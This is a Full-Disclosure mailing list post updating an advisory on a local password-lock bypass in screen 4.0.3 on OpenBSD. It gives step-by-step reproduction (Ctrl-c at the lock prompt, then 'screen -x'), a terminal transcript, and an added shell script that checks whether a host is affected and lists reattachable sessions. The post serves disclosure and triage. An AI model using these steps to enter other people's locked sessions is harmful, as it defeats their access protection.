
[Full-disclosure] screen 4.03 password bypass vuln - UPDATE (for you sec dudes...)



Well, I improved the advisory I released a while ago after I found several
websites which claim that this is a fake/myth security problem because they
were not able to reproduce it on their boxes...

The updated version is available at milw0rm (thanks to str0ke) and I
recommend that all who mirrored the article update it.

milw0rm link:
http://www.milw0rm.com/exploits/4028

I even included a little example to make it foolproof... I was really
impressed that some think it's a fake/myth and claim that on their
website.

So it would be nice if the guys at osvdb.org (and others) would update
their articles, rating and whatever else matters to them to correct their
statements....

I have now named an OS and how to reproduce it.
So feel free to install oBSD in a VM. ;]

The new version of the "improved" advisory is attached too for your
convenience. The bug itself is still the old one....


Kind regards,
Rembrandt
                     _   _ _____ _     ___ _____ _   _
                   / / / / ____/ /   /  _/_  __/ / / /
                  / /_/ / __/ / /    / /  / / / /_/ /
                 / __  / /___/ /____/ /  / / / __  /
                /_/ /_/_____/_____/___/ /_/ /_/ /_/
                           Helith - 0815
--------------------------------------------------------------------------------

Author: Rembrandt
Date  : Known for some years (exact date not remembered)
Affected Software: screen <= 4.0.3
Affected OS      : OpenBSD (any release up to -current (which will become OpenBSD 4.4))
Type: Local
Type: Authentication Bypass

Greets go to: Helith and all affiliated/loyal people 


I did not find an advisory related to this, so I decided to write a leet one.

screen is vulnerable to an authentication bypass which allows local attackers
to get into a screen session (and the shells it contains) even though the
session was locked with a password.

It has been tested on OpenBSD with screen 4.0.3 on x86/amd64.
Given the nature of the behaviour of screen and OpenBSD it should be
architecture- and version-independent for now.


How to check this?

Lock the screen session with Ctrl-a x (screen's lockscreen command)
Choose a password
Confirm the password

screen now asks for the password to unlock the session.
Just press Ctrl-c and, if you like, run "screen -x" to reattach the screen session.

Example:

$ testscreen
/bin/ksh: testscreen: not found
$
Key:
Again:
Screen used by rembrandt <rembrandt>.
Password: <ctrl-c here>
$ screen -x
There are several suitable screens on:
        29602.ttyC0.raven       (Attached)
        25144.ttyC1.raven       (Detached)
Type "screen [-d] -r [pid.]tty.host" to resume one of them.
$ screen -x 25144
$ testscreen
/bin/ksh: testscreen: not found
$ 

Because of this behaviour of a locked screen you cannot really lock your shell:
after Ctrl-c the session is simply left detached, and reattaching it never
asks you for the password.
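To turn the check above into something you can run on a batch of hosts, here is an added triage script, written for this page and not taken from the advisory or from screen's own sources. It assumes that "screen -v" prints a banner of the form "Screen version 4.00.03 (FAU) 2-May-06" and that "screen -ls" lists sessions in the format shown in the transcript above; the sample "screen -ls" output embedded in it is constructed from that transcript. It gates on the advisory's own combination (OpenBSD plus screen at or below 4.0.3) and then lists the detached sessions a user in the same account could pick up with "screen -x" without being asked for the lock password.

```sh
#!/bin/sh
# Added triage helper; it is not part of the advisory or of screen itself.
# It decides whether a host matches the advisory's affected combination
# (OpenBSD plus screen <= 4.0.3) and lists the screen sessions a local user
# could reattach with "screen -x". Only POSIX sh, sed and awk are used.

# Normalise a version string such as "4.0.3", "4.00.03" or "4.0.3rc1" into a
# single comparable integer: major*10000 + minor*100 + patch.
# Anything from the first non-digit/non-dot character on is ignored.
version_number() {
    printf '%s\n' "$1" | sed 's/[^0-9.].*$//' |
        awk -F. '{ printf "%d\n", ($1 + 0) * 10000 + ($2 + 0) * 100 + ($3 + 0) }'
}

# True (exit 0) when the screen version falls in the advisory's range (<= 4.0.3).
screen_version_affected() {
    [ "$(version_number "$1")" -le 40003 ]
}

# Pull the version out of the banner printed by "screen -v" (assumed format),
# e.g. "Screen version 4.00.03 (FAU) 2-May-06" -> "4.00.03".
screen_version_from_banner() {
    printf '%s\n' "$1" | awk '/^Screen version/ { print $3; exit }'
}

# Read "screen -ls" output on stdin and print one "pid.tty.host state" line per
# session, e.g. "25144.ttyC1.raven Detached". The state is whatever screen
# printed inside the parentheses, so multi-word states such as
# "Multi, attached" survive as written.
list_sessions() {
    awk '$1 ~ /^[0-9]+\./ {
        state = $2
        for (i = 3; i <= NF; i++) state = state " " $i
        gsub(/[()]/, "", state)
        print $1, state
    }'
}

# Only the sessions that are currently detached: these are the ones a local
# user in the same account can pick up with "screen -x <pid>" and, per the
# advisory, never be asked for the lock password.
detached_sessions() {
    list_sessions | awk '$2 == "Detached" { print $1 }'
}

# Constructed sample, copied from the advisory's own transcript, so the parsing
# can be exercised on a box without screen installed.
SAMPLE_LS='There are several suitable screens on:
        29602.ttyC0.raven       (Attached)
        25144.ttyC1.raven       (Detached)
Type "screen [-d] -r [pid.]tty.host" to resume one of them.'

# Live check of the current host. Returns 0 when the host matches the
# advisory's affected combination, 1 otherwise.
triage() {
    os=$(uname -s)
    ver=$(screen_version_from_banner "$(screen -v 2>&1)")
    if [ "$os" = OpenBSD ] && [ -n "$ver" ] && screen_version_affected "$ver"; then
        echo "affected combination: $os with screen $ver; detached sessions:"
        screen -ls 2>/dev/null | detached_sessions
        return 0
    fi
    echo "not the advisory's combination: $os with screen ${ver:-unknown}"
    return 1
}

# Run the live check only when asked, so the file can also be sourced for its
# functions:  sh screen_triage.sh run
if [ "${1:-}" = run ]; then
    triage
fi
```

Run "sh screen_triage.sh run" on the host to be checked; the exit status is 0 when the host matches the advisory's combination. The script only tells you whether the conditions named in the advisory hold and which sessions are exposed to "screen -x"; it does not itself send Ctrl-c to a lock prompt.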

Of course this also works if you get access to an SSH session which has a locked
screen running. So if you have locked a screen session which contains an open
SSH session to a host where you also have a locked screen session, you may
have no password protection at all if all systems are OpenBSD.
That is just another example. What matters for you is the combination of
screen and OpenBSD.

Do not claim it does not work because you just tested this against the latest
Linux/Solaris/whatever.

It is known to work, and I mentioned the OS.
It is also known to have worked against some scary Linux distributions
which are not really common.

All security websites which report this as a fake may consider updating their
reports instead of simply claiming wrong things.

Have fun!


Kind regards,
Rembrandt
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/